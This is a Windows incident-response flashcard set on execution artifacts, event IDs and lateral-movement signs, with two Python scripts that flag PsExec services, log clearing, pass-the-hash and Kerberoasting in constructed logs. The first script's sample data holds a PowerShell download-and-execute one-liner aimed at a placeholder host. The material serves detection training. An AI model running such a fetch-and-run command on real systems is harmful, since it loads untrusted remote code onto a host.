Section 2: Evidence of Execution, Logs, & Lateral Movement

Last updated 8:49 PM on 6/16/26
18 Terms

1. What is the goal of evidence-of-execution analysis?

To establish which program ran, when it ran and how it was launched, by correlating several independent artifacts (Prefetch, Amcache, ShimCache, event logs) rather than trusting any single one of them.

2. What information does Prefetch provide?

Strong evidence that a program executed: the executable name, a run count, the last run time (up to the last eight run times on Windows 8 and later; earlier versions keep only the most recent) and the files and directories the program touched while starting. Prefetch is disabled by default on Windows Server editions, so a missing .pf file is not proof that a program never ran.

3. What does Amcache.hve store for an executable?

The file's SHA-1 hash (computed over at most the first 31,457,280 bytes, so very large files are only partially hashed), its full path, and a timestamp taken from the registry key's last-write time. An Amcache entry shows the file was present and inventoried; on its own it is weaker proof of execution than Prefetch, so corroborate it with other artifacts.

4. What does ShimCache (AppCompatCache) prove?

It proves a file was present on the system and was checked for application compatibility, but it does NOT prove the file actually executed. (Windows 7 entries carried an "insert flag" that suggested execution; on Windows 8 and later that distinction is gone, so treat ShimCache as evidence of presence only.)

5. What value is used to track all activities within a single, unique user logon session?

The Logon ID (e.g., 0x2F8A1). It is assigned in the 4624 event (Target Logon ID) and reappears as the Subject Logon ID in later events of that session. It is unique only per boot of one host, so correlate per host, not across hosts.

6. What does Event ID 4624 followed immediately by 4672 signify?

A successful logon (4624) whose new session was assigned sensitive privileges such as SeDebugPrivilege (4672), i.e. an administrative-level account. The two records share the same Logon ID, which is how they are tied together.

7. What does Event ID 7045 indicate?

A new service was installed (recorded in the System log). Lateral-movement tools such as PsExec work by installing a service on the target (PSEXESVC by default), so an unexpected 7045, especially one with a randomly named service or an unusual binary path, is a key indicator.

8. What does Event ID 4648 show?

A logon attempt using explicit credentials, i.e. a process supplied a username and password other than its own token's, as with the 'runas' command, "Run as different user", entering another account's credentials at a UAC prompt, or pass-the-hash tooling on the source host.

9. What does Event ID 1102 indicate?

The Security log was cleared, recorded together with the account that cleared it (a strong indicator of defense evasion). Clearing the System or other logs produces Event ID 104 instead.

10. What does Event ID 4104 (PowerShell Script Block Logging) capture?

The text of each script block as PowerShell compiles it, written to the Microsoft-Windows-PowerShell/Operational log. Because logging happens at compile time, code hidden behind encoding or Invoke-Expression is captured in decoded form in a later 4104 record, which undoes many obfuscation layers without analyst effort.

11. What does a "Warning" level on a 4104 PowerShell event signify?

PowerShell itself classed the script block as suspicious because it matched its built-in list of suspicious terms. These Warning-level 4104 records are written even when Script Block Logging has not been enabled by policy, so they are available on hosts with default settings.

12. What is the key feature of PowerShell transcript logs?

They record both the commands an attacker typed AND the full console output of those commands, as plain-text files (by default in the user's Documents folder, or in a central share set by the transcription policy). Unlike 4104, they therefore show what the attacker actually saw.
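The cards on Logon IDs, 4624/4672, 7045, 4648, 1102 and Warning-level 4104 describe a correlation workflow; the following is an added example (not part of the original card set) that runs that workflow in Python over a constructed batch of event records. Field names follow the EventData names seen in exported Windows events; the sample records and the severity labels are assumptions made for the illustration.

```python
"""Correlate Windows event records by Logon ID and flag the sequences the cards
describe. The records below are constructed to mimic fields exported from
Get-WinEvent (field names follow EventData); they are not real incident data."""
from collections import defaultdict

# Constructed sample: one admin session (0x2F8A1) that installs a PsExec-style
# service, runs a flagged script block and then clears the Security log, plus an
# unremarkable console logon (0x3A001) that must not produce findings.
SAMPLE_EVENTS = [
    {"Log": "Security", "EventID": 4624, "Time": "2024-01-05T10:00:00",
     "Data": {"TargetUserName": "alice", "TargetLogonId": "0x2F8A1",
              "LogonType": "3", "IpAddress": "10.0.0.5"}},
    {"Log": "Security", "EventID": 4672, "Time": "2024-01-05T10:00:00",
     "Data": {"SubjectUserName": "alice", "SubjectLogonId": "0x2F8A1",
              "PrivilegeList": "SeDebugPrivilege SeImpersonatePrivilege"}},
    {"Log": "Security", "EventID": 4648, "Time": "2024-01-05T10:01:10",
     "Data": {"SubjectUserName": "alice", "SubjectLogonId": "0x2F8A1",
              "TargetUserName": "svc_backup", "TargetServerName": "FS01"}},
    {"Log": "System", "EventID": 7045, "Time": "2024-01-05T10:01:30",
     "Data": {"ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"}},
    {"Log": "Microsoft-Windows-PowerShell/Operational", "EventID": 4104,
     "Level": "Warning", "Time": "2024-01-05T10:02:00",
     "Data": {"ScriptBlockText": "IEX (New-Object Net.WebClient)"
                                 ".DownloadString('http://example.invalid/a')"}},
    {"Log": "Security", "EventID": 1102, "Time": "2024-01-05T10:05:00",
     "Data": {"SubjectUserName": "alice", "SubjectLogonId": "0x2F8A1"}},
    {"Log": "Security", "EventID": 4624, "Time": "2024-01-05T11:00:00",
     "Data": {"TargetUserName": "bob", "TargetLogonId": "0x3A001",
              "LogonType": "2", "IpAddress": "-"}},
]


def logon_id(ev):
    """4624 carries the new session's ID as TargetLogonId; later events in the
    same session carry it as SubjectLogonId."""
    return ev["Data"].get("TargetLogonId") or ev["Data"].get("SubjectLogonId")


def build_sessions(events):
    """Group Security-log events by Logon ID. Logon IDs are unique only per boot
    of one host, so events from several hosts must be grouped per host first."""
    sessions = defaultdict(list)
    for ev in events:
        lid = logon_id(ev)
        if ev["Log"] == "Security" and lid:
            sessions[lid].append(ev)
    return sessions


def analyze(events):
    """Return (severity, logon_id_or_None, message) findings: session-scoped
    findings first, then log-wide ones that carry no Logon ID (7045, 4104)."""
    findings = []
    for lid, evs in build_sessions(events).items():
        ids = {e["EventID"] for e in evs}
        user = next((e["Data"]["TargetUserName"] for e in evs if e["EventID"] == 4624), "?")
        if 4624 in ids and 4672 in ids:
            findings.append(("info", lid, f"privileged logon for {user}"))
        for e in evs:
            d = e["Data"]
            if e["EventID"] == 4648:
                findings.append(("medium", lid, f"{user} used explicit credentials for "
                                                f"{d['TargetUserName']} on {d['TargetServerName']}"))
            elif e["EventID"] == 1102:
                findings.append(("high", lid, f"Security log cleared by {user}"))
    for ev in events:
        d = ev["Data"]
        if ev["EventID"] == 7045:
            # PSEXESVC is PsExec's default name; renamed copies still produce a
            # 7045, so review every unexpected service install, not only this match.
            if "PSEXESVC" in (d.get("ServiceName", "") + d.get("ImagePath", "")).upper():
                findings.append(("high", None, f"PsExec-style service installed: {d['ServiceName']}"))
        elif ev["EventID"] == 4104 and ev.get("Level") == "Warning":
            findings.append(("medium", None,
                             "PowerShell flagged a suspicious script block: " + d["ScriptBlockText"][:50]))
    return findings


if __name__ == "__main__":
    for sev, lid, msg in analyze(SAMPLE_EVENTS):
        print(f"[{sev:6}] {lid or '-':8} {msg}")
```

The 7045 and 4104 findings are deliberately not tied to a Logon ID: the System and PowerShell logs do not carry one, so linking them to the session is done by time proximity and host, which the analyst still has to judge.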

13. What is the parent process for a PowerShell Remoting session?

wsmprovhost.exe, the WinRM provider host that runs the remote runspace. Any command launched through Enter-PSSession or Invoke-Command appears as a child of wsmprovhost.exe rather than of an interactive powershell.exe, which makes it a useful process-tree filter.

14. What service must be enabled to modify the registry of a remote computer for lateral movement?

The Remote Registry service (RemoteRegistry). It is not running by default on Windows client editions, so an attacker usually has to start it first, typically through the Service Control Manager over SMB, which itself leaves traces.

15. What Logon Type number is generated by a PowerShell Remoting session?

Logon Type 3 (Network) on the target, because WinRM authenticates over the network with Kerberos or NTLM; the matching 4624 records the source IP address.

16. What is pass-the-hash?

An attack in which a stolen NTLM hash is used to authenticate as that user without knowing the plaintext password, which works because NTLM authentication proves possession of the hash, not of the password. On the target it appears as a Type 3 logon with authentication package NTLM.

17. What is Kerberoasting?

Requesting TGS service tickets (Event ID 4769 on the domain controller) for accounts that have a Service Principal Name (SPN), then cracking the tickets offline to recover the service account's password. Tickets requested with RC4 (encryption type 0x17) are the easiest to crack, so a burst of RC4 ticket requests from one user for many SPNs is the classic signal.
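The pass-the-hash and Kerberoasting cards each imply a detection on the Security log. The following is an added example (not part of the original card set) that implements both as heuristics in Python over constructed 4624 and 4769 records. Field names follow EventData; the five-minute window, the three-SPN threshold, the domain name and the sample hosts are assumptions for the illustration.

```python
"""Heuristic detections for pass-the-hash and Kerberoasting over constructed
Security-log records. Field names follow EventData for 4624 and 4769; the
window/threshold values are illustrative assumptions, not published rules."""
from collections import defaultdict
from datetime import datetime, timedelta


def logon(t, user, pkg, ip, ws):
    """Constructed 4624 network logon (Logon Type 3) record."""
    return {"EventID": 4624, "Time": t, "Data": {
        "TargetUserName": user, "TargetDomainName": "CORP", "LogonType": "3",
        "AuthenticationPackageName": pkg, "IpAddress": ip, "WorkstationName": ws}}


def tgs(t, user, svc, etype):
    """Constructed 4769 (TGS requested) record as written on a domain controller.
    ServiceName is the service *account* name, not the SPN string itself."""
    return {"EventID": 4769, "Time": t, "Data": {
        "TargetUserName": user, "ServiceName": svc,
        "TicketEncryptionType": etype, "IpAddress": "::ffff:10.0.0.99"}}


# Constructed sample: alice normally authenticates with Kerberos from WS05, then
# appears with NTLM from an unknown host and requests RC4 tickets for three
# service accounts within seconds. A machine account and AES requests are
# included as the noise the heuristics must ignore.
SAMPLE = [
    logon("2024-01-05T09:00:00", "alice", "Kerberos", "10.0.0.5", "WS05"),
    logon("2024-01-05T09:10:00", "alice", "NTLM", "10.0.0.99", "kali"),
    logon("2024-01-05T09:11:00", "WS07$", "NTLM", "10.0.0.7", "WS07"),
    tgs("2024-01-05T09:20:00", "alice@CORP.LOCAL", "svc_sql", "0x17"),
    tgs("2024-01-05T09:20:01", "alice@CORP.LOCAL", "svc_http", "0x17"),
    tgs("2024-01-05T09:20:02", "alice@CORP.LOCAL", "svc_backup", "0x17"),
    tgs("2024-01-05T09:20:03", "alice@CORP.LOCAL", "krbtgt", "0x12"),
    tgs("2024-01-05T09:45:00", "bob@CORP.LOCAL", "WS07$", "0x12"),
]


def pass_the_hash_candidates(events):
    """4624 Logon Type 3 authenticated with NTLM for a non-machine account.
    NTLM proves possession of the hash, not the password, so in a domain where
    Kerberos is the norm this is a lead to verify (NTLM fallback is legitimate
    for IP-address targets and non-domain hosts), not proof on its own."""
    hits = []
    for ev in events:
        d = ev["Data"]
        if ev["EventID"] != 4624 or d["LogonType"] != "3":
            continue
        if d["AuthenticationPackageName"] != "NTLM" or d["TargetUserName"].endswith("$"):
            continue
        hits.append((d["TargetUserName"], d["IpAddress"], d["WorkstationName"]))
    return hits


def kerberoast_candidates(events, window=timedelta(minutes=5), min_spns=3):
    """One principal requesting RC4-HMAC (0x17) service tickets for at least
    min_spns distinct service accounts inside `window`. krbtgt and machine
    accounts (long random passwords, not realistically crackable) are skipped."""
    by_user = defaultdict(list)
    for ev in events:
        d = ev["Data"]
        if ev["EventID"] != 4769 or d["TicketEncryptionType"] != "0x17":
            continue
        svc = d["ServiceName"]
        if svc == "krbtgt" or svc.endswith("$"):
            continue
        by_user[d["TargetUserName"]].append((datetime.fromisoformat(ev["Time"]), svc))
    hits = []
    for user, reqs in by_user.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            spns = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(spns) >= min_spns:
                hits.append((user, sorted(spns)))
                break
    return hits


if __name__ == "__main__":
    print("pass-the-hash leads:", pass_the_hash_candidates(SAMPLE))
    print("kerberoast leads:", kerberoast_candidates(SAMPLE))
```

Both functions return leads rather than verdicts: an NTLM network logon has benign causes, and a single RC4 ticket request is normal for legacy services, which is why the Kerberoasting rule keys on many distinct service accounts in a short window and drops AES (0x12) requests and machine accounts before counting.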
